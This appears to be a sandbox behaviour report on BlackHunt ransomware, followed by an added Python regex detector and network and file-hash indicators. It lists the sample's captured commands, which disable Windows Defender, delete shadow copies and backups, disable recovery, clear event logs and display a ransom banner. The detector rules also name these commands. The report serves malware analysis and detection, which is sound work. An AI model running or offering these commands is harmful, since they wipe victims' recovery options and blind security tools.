"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe" /F

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D F:\

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D C:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application

C:\Windows\system32\fsutil.exe

fsutil usn deletejournal /D M:\

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Setup

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl System

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Application

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security /e:false

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl Security

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy IgnoreAllFailures

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\fsutil.exe

fsutil.exe usn deletejournal /D C:

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable

C:\Windows\system32\wbadmin.exe

wbadmin.exe delete catalog -quiet

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected] ,TELEGRAM:@GotchaDec] " /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f

C:\Windows\system32\schtasks.exe

SCHTASKS.exe /Delete /TN "Windows Critical Update" /F

C:\Windows\system32\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f

C:\Windows\system32\taskkill.exe

taskkill /IM mshta.exe /f

C:\Windows\system32\notepad.exe

notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 5

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5532 -ip 5532

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5532 -s 1464
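
The command lines above are the sample's whole pre-encryption playbook: shadow copies, the backup catalog, the recovery environment and the System Restore task are removed or disabled, the Security and Application logs and the NTFS USN journal are wiped, a logon banner is written through the registry, the ransom note is shown through mshta, and the dropper deletes itself after a ping delay. The script below is an added example written for this page, not part of the sandbox report and not BlackHunt code. It runs a small set of regex rules over constructed process-creation records in a `pid|image|command line` format, with the command lines copied from the listing above and the PIDs, the record format and the ATT&CK technique mapping all chosen by the editor. It also handles one point worth checking in the data: the captured `reg add ... DisableTaskMgr /d 0` writes a zero, which re-enables Task Manager, so a rule keyed on the value name alone would misreport it, and the example reads the written value instead. A benign `vssadmin List Shadows` record is included as a control that must not fire.

```python
import re
from collections import defaultdict

# Constructed process-creation records ("pid|image|command line"); the command
# lines come from the behavioral listing of this sample, the PIDs are made up.
SAMPLE_EVENTS = [
    r'4120|C:\Windows\system32\vssadmin.exe|vssadmin.exe Delete Shadows /all /quiet',
    r'4132|C:\Windows\system32\wbadmin.exe|wbadmin.exe delete catalog -quiet',
    r'4140|C:\Windows\system32\bcdedit.exe|bcdedit /set {default} recoveryenabled No',
    r'4148|C:\Windows\system32\bcdedit.exe|bcdedit /set {default} bootstatuspolicy IgnoreAllFailures',
    r'4156|C:\Windows\system32\schtasks.exe|schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable',
    r'4164|C:\Windows\system32\wevtutil.exe|wevtutil.exe cl Security',
    r'4172|C:\Windows\system32\wevtutil.exe|wevtutil.exe cl Application',
    r'4180|C:\Windows\system32\fsutil.exe|fsutil.exe usn deletejournal /D C:',
    r'4188|C:\Windows\system32\reg.exe|REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f',
    r'4196|C:\Windows\system32\reg.exe|reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f',
    r'4204|C:\Windows\SysWOW64\cmd.exe|"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\BlackHunt2.exe"',
    r'4212|C:\Windows\SysWOW64\mshta.exe|"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"',
    # Benign control: an administrator listing shadow copies must not match.
    r'5000|C:\Windows\system32\vssadmin.exe|vssadmin.exe List Shadows',
]

# (ATT&CK technique, description, pattern). Technique IDs are the editor's
# mapping. Patterns are case-insensitive and tolerate a missing ".exe".
RULES = [
    ("T1490", "shadow copies deleted (vssadmin)",
     re.compile(r'\bvssadmin(?:\.exe)?\s+delete\s+shadows\b.*/all', re.I)),
    ("T1490", "backup catalog deleted (wbadmin)",
     re.compile(r'\bwbadmin(?:\.exe)?\s+delete\s+catalog\b', re.I)),
    ("T1490", "Windows recovery environment disabled (bcdedit)",
     re.compile(r'\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no\b', re.I)),
    ("T1490", "boot status policy set to ignore failures (bcdedit)",
     re.compile(r'\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures\b', re.I)),
    ("T1490", "System Restore scheduled task disabled (schtasks)",
     re.compile(r'\bschtasks(?:\.exe)?\s+/change\s+/tn\s+"?\\microsoft\\windows\\systemrestore\\sr"?\s+/disable', re.I)),
    ("T1070.001", "Windows event log cleared (wevtutil cl)",
     re.compile(r'\bwevtutil(?:\.exe)?\s+cl\s+\w+', re.I)),
    ("T1070", "NTFS USN change journal deleted (fsutil)",
     re.compile(r'\bfsutil(?:\.exe)?\s+usn\s+deletejournal\b', re.I)),
    ("T1112", "logon legal notice written via registry (ransom banner)",
     re.compile(r'\breg(?:\.exe)?\s+add\b.*policies\\system.*legalnotice(?:caption|text)', re.I)),
    ("T1070.004", "self-deletion via ping delay and del",
     re.compile(r'\bping\s+127\.0\.0\.1\b.*&\s*del\b', re.I)),
    ("T1218.005", "HTA executed via mshta (ransom note)",
     re.compile(r'\bmshta(?:\.exe)?"?\s+"?[^"\s]*\.hta\b', re.I)),
]

# DisableTaskMgr is handled separately so the written DWORD is inspected:
# only a non-zero value actually disables Task Manager.
TASKMGR_RE = re.compile(
    r'\breg(?:\.exe)?\s+add\b.*\\policies\\system"?\s+/v\s+"?disabletaskmgr"?.*?/d\s+(\d+)', re.I)


def classify(cmdline):
    """Return the list of (technique, description) pairs matched by one command line."""
    matches = [(tech, desc) for tech, desc, rx in RULES if rx.search(cmdline)]
    m = TASKMGR_RE.search(cmdline)
    if m:
        if m.group(1) == "0":
            matches.append(("T1112", "DisableTaskMgr written as 0 (Task Manager re-enabled, not disabled)"))
        else:
            matches.append(("T1112", "Task Manager disabled via DisableTaskMgr"))
    return matches


def triage(events):
    """Classify each record and derive a verdict from the distinct recovery-inhibiting actions seen."""
    hits = []
    techniques = defaultdict(set)  # technique -> distinct descriptions observed
    for record in events:
        pid, image, cmd = record.split("|", 2)
        for tech, desc in classify(cmd):
            hits.append({"pid": int(pid), "image": image, "technique": tech, "description": desc})
            techniques[tech].add(desc)
    recovery = len(techniques["T1490"])
    log_wiping = len(techniques["T1070.001"]) + len(techniques["T1070"])
    if recovery >= 2 and log_wiping >= 1:
        verdict = "ransomware pre-encryption pattern"
    elif recovery >= 1:
        verdict = "suspicious: recovery inhibited"
    else:
        verdict = "no ransomware indicators"
    return {"hits": hits, "techniques": {k: sorted(v) for k, v in techniques.items()}, "verdict": verdict}


if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for h in result["hits"]:
        print(f'{h["pid"]:>5}  {h["technique"]:<10} {h["description"]}')
    print("verdict:", result["verdict"])
```

The verdict requires at least two distinct recovery-inhibiting actions plus one log- or journal-wiping action, because any one of these commands also appears in legitimate administration (backup rotation, `bcdedit` on a lab VM, a scripted `wevtutil cl` before a migration); the combination within one process tree is what separates this sample from noise. In a real pipeline the same rules would be fed from Sysmon Event ID 1 or Security 4688 command-line auditing, and the `image` field should be checked against the expected path as well, since this sample invokes everything through `cmd.exe /c` and the 32-bit dropper's `cmd.exe` is redirected to SysWOW64.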

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 109.116.69.13.in-addr.arpa udp

Files

C:\ProgramData\#BlackHunt_Private.key

MD5 f4f7988587a465bd6c04a49016b70cf0
SHA1 bcff36a016e1eceef0c4e7e69628cfa59607559a
SHA256 acf0eb663609da6c6fd62981337ed363a80a14f3b5c4eb34cc577fed09816559
SHA512 529f58a068f531fb13b53e79c7539048d9ed01a90a54cd004e8b4b24b832f8e70b43086196abe79920502511f90ef714a448c128c2c24bd5428ad1875bf36d69

C:\ProgramData\#BlackHunt_ReadMe.hta

MD5 ae2d3987e6ba5b4ea92f317998a2a4f9
SHA1 01ee99194e752192c4a0ac4f19762584d8e17389
SHA256 8dfabb55bec408a83f2f68bf18dbde381e9f994959be8a703083ff2a0ed5f1b2
SHA512 c49de0560b0ef753aa21a3461f7585d5c01f490c0cad23bc6dcc7bb7c8886e422f044d92d04279088626a44d4e0711cfbddc71111f5a850332ae55549499abbd

F:\#BlackHunt_ReadMe.txt

MD5 3ab22aac08208efb070cc3d8fbe7be68
SHA1 ce5153241004f82b9c34e6c24075e81fee1cab2c
SHA256 b4ea9f97cee7b607bfacf88b2f097a5496686a43d1516008e7d2811f60b803f7
